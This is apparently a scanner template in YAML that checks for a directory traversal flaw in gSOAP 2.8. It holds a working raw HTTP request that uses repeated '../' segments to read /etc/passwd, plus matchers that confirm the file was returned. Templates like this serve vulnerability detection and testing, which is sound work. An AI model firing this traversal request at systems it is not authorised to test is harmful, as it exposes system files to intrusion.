id: gsoap-lfi

info:
  name: gSOAP 2.8 - Directory Traversal
  author: 0x_Akoko
  severity: high
  reference: https://www.exploit-db.com/exploits/47653
  tags: gsoap,lfi

requests:
  - raw:
      - |
        GET /../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
        Connection: close

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
